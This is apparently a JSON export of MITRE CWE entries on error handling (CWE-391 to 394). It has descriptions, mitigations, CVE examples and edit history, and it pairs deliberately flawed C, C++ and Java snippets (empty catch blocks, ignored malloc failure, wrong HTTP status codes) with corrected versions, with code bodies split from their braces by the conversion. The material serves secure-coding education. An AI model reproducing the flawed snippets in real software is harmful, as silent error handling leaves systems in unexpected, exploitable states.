failed.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {}","xhtml:br":"","xhtml:div":{"#text":"//We do nothing so we just ignore the error.","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {}","xhtml:br":"","xhtml:div":{"#text":"printf(\\"Malloc failed to allocate memory resources\\");return -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate.","Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code."]},{"Intro_Text":"In the following C++ example the method readFile() will read the file whose name is provided in the input parameter and will return the contents of the file in char string. The method calls open() and read() may result in errors if the file does not exist or does not contain any data to read. These errors will be thrown when the is_open() method and good() method indicate errors opening or reading the file. However, these errors are not handled within the catch statement. Catch statements that do not perform any processing will have unexpected results. In this case an empty char string will be returned, and the file will not be properly closed.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"char* readfile (char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (...) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// open input fileifstream infile;infile.open(filename);if (!infile.is_open()) {}// get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg);// allocate memorychar *buffer = new char [length];// read data from fileinfile.read (buffer,length);if (!infile.good()) {}infile.close();return buffer;","xhtml:br":["","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"throw \\"Unable to open file \\" + filename;","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw \\"Unable to read from file \\" + filename;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"/* bug: insert code to handle this later */","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"char* readFile (char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (char *str) {}catch (...) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// open input fileifstream infile;infile.open(filename);if (!infile.is_open()) {}// get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg);// allocate memorychar *buffer = new char [length];// read data from fileinfile.read (buffer,length);if (!infile.good()) {}infile.close();return buffer;","xhtml:br":["","","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"throw \\"Unable to open file \\" + filename;","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw \\"Unable to read from file \\" + filename;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"printf(\\"Error: %s \\\\n\\", str);infile.close();throw str;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Error occurred trying to read from file \\\\n\\");infile.close();throw;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["",""]}}}}],"Body_Text":"The catch statement should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following C++ example contains two catch statements. The first of these will catch a specific error thrown within the try block, and the second catch statement will catch all other errors from within the catch block. Both catch statements will notify the user that an error has occurred, close the file, and rethrow to the block that called the readFile() method for further handling or possible termination of the program."},{"Intro_Text":"In the following Java example the method readFile will read the file whose name is provided in the input parameter and will return the contents of the file in a String object. The constructor of the FileReader object and the read method call may throw exceptions and therefore must be within a try/catch block. While the catch statement in this example will catch thrown exceptions in order for the method to compile, no processing is performed to handle the thrown exceptions. Catch statements that do not perform any processing will have unexpected results. In this case, this will result in the return of a null String.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String readFile(String filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String retString = null;try {} catch (Exception ex) {}return retString;","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file);// initialize character bufferlong fLen = file.length();char[] cBuf = new char[(int) fLen];// read data from fileint iRead = fr.read(cBuf, 0, (int) fLen);// close filefr.close();retString = new String(cBuf);","xhtml:br":["","","","","","","","","","","","","","",""]}},{"#text":"/* do nothing, but catch so it\'ll compile... */","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String readFile(String filename) throws FileNotFoundException, IOException, Exception {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String retString = null;try {} catch (FileNotFoundException ex) {} catch (IOException ex) {} catch (Exception ex) {}return retString;","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file);// initialize character bufferlong fLen = file.length();char [] cBuf = new char[(int) fLen];// read data from fileint iRead = fr.read(cBuf, 0, (int) fLen);// close filefr.close();retString = new String(cBuf);","xhtml:br":["","","","","","","","","","","","","","",""]}},{"#text":"System.err.println (\\"Error: FileNotFoundException opening the input file: \\" + filename );System.err.println (\\"\\" + ex.getMessage() );throw new FileNotFoundException(ex.getMessage());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"System.err.println(\\"Error: IOException reading the input file.\\\\n\\" + ex.getMessage() );throw new IOException(ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Error: Exception reading the input file.\\\\n\\" + ex.getMessage() );throw new Exception(ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}],"Body_Text":"The catch statement should contain statements that either attempt to fix the problem, notify the user that an exception has been raised and continue processing, or perform some cleanup and gracefully terminate the program. The following Java example contains three catch statements. The first of these will catch the FileNotFoundException that may be thrown by the FileReader constructor called within the try/catch block. The second catch statement will catch the IOException that may be thrown by the read method called within the try/catch block. The third catch statement will catch all other exceptions thrown within the try block. For all catch statements the user is notified that the exception has been thrown and the exception is rethrown to the block that called the readFile() method for further processing or possible termination of the program. Note that with Java it is usually good practice to use the getMessage() method of the exception class to provide more information to the user about the exception raised."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper error handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR00-J","Entry_Name":"Do not suppress or ignore checked exceptions"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Improper Error Handling","attr":{"@_Date":"2008-04-11"}}}},"391":{"attr":{"@_ID":"391","@_Name":"Unchecked Error Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"The choice between a language which has named or unnamed exceptions needs to be done. While unnamed exceptions exacerbate the chance of not properly dealing with an exception, named exceptions suffer from the up call version of the weak base class problem."},{"Phase":"Requirements","Description":"A language can be used which requires, at compile time, to catch all serious exceptions. However, one must make sure to use the most current version of the API as new exceptions could be added."},{"Phase":"Implementation","Description":"Catch all relevant exceptions. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt ignores a rarely-thrown exception from doExchange().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (RareException e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// this can never happen"}}],"xhtml:br":""}},"Body_Text":"If a RareException were to ever be thrown, the program would continue to execute as though nothing unusual had occurred. The program records no evidence indicating the special situation, potentially frustrating any later attempt to explain the program\'s behavior."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unchecked Return Value"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Empty Catch Block"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Uncaught exception"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR00-C","Entry_Name":"Adopt and implement a consistent and comprehensive error-handling policy"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP32-C","Entry_Name":"Prevent or detect domain and range errors in math functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":[{"#text":"This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts.  It currently combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue.  CWE analysts might map to this entry based on any of these issues.  7PK has \\"Empty Catch Block\\" which has an association with empty exception block (CWE-1069); in this case, the exception has performed the check, but does not handle.  In PLOVER there is \\"Unchecked Return Value\\" which is CWE-252, but unlike \\"Empty Catch Block\\" there isn\'t even a check of the issue - and \\"Unchecked Error Condition\\" implies lack of a check.  For CLASP, \\"Uncaught Exception\\" (CWE-248) is associated with incorrect error propagation - uncovered in CWE 3.2 and earlier, at least.  There are other issues related to error handling and checks.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Other"},"xhtml:p":"When a programmer ignores an exception, they implicitly state that they are operating under one of two assumptions:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["This method call can never fail.","It doesn\'t matter if this call fails."]}}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"392":{"attr":{"@_ID":"392","@_Name":"Missing Report of Error Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software encounters an error but does not provide a status code or return value to indicate that an error has occurred.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"],"Note":"Errors that are not properly reported could place the system in an unexpected state that could lead to unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following snippet from a doPost() servlet method, the server returns \\"200 OK\\" (default) even if an error occurs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Throwable t) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// Something that may throw an exception."}},{"#text":"logger.error(\\"Caught: \\" + t.toString());return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0063","Description":"Function returns \\"OK\\" even if another function returns a different status code than expected, leading to accepting an invalid PIN number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0063"},{"Reference":"CVE-2002-1446","Description":"Error checking routine in PKCS#11 library returns \\"OK\\" status even when invalid signature is detected, allowing spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1446"},{"Reference":"CVE-2002-0499","Description":"Kernel function truncates long pathnames without generating an error, leading to operation on wrong directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0499"},{"Reference":"CVE-2005-2459","Description":"Function returns non-error value when a particular erroneous condition is encountered, leading to resultant NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2459"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Error Status Code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS03-J","Entry_Name":"Ensure that tasks executing in a thread pool do not fail silently"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Missing Error Status Code","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Report Error in Status Code","attr":{"@_Date":"2010-12-13"}}]}},"393":{"attr":{"@_ID":"393","@_Name":"Return of Wrong Status Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function or operation returns an incorrect return value or status code that does not indicate an error, but causes the product to modify its behavior based on the incorrect result.","Extended_Description":"This can lead to unpredictable behavior. If the function is used to make security-critical decisions or provide security-critical information, then the wrong status code can cause the software to assume that an action is safe, even when it is not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Alter Execution Logic"],"Note":"This weakness could place the system in a state that could lead unexpected logic to be executed or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, an HTTP 404 status code is returned in the event of an IOException encountered in a Java servlet. A 404 code is typically meant to indicate a non-existent resource and would be somewhat misleading in this case.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (IOException ioe) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// something that might throw IOException"}},{"#text":"response.sendError(SC_NOT_FOUND);","attr":{"@_style":"margin-left:10px;"}}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-1132","Description":"DNS server returns wrong response code for non-existent AAAA record, which effectively says that the domain is inaccessible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1132"},{"Reference":"CVE-2001-1509","Description":"Hardware-specific implementation of system call causes incorrect results from geteuid.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1509"},{"Reference":"CVE-2001-1559","Description":"System call returns wrong value, leading to a resultant NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1559"},{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wrong Status Code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Notes":{"Note":{"#text":"This can be primary or resultant, but it is probably most often primary to other issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Wrong Status Code","attr":{"@_Date":"2008-04-11"}}}},"394":{"attr":{"@_ID":"394","@_Name":"Unexpected Status Code or Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and 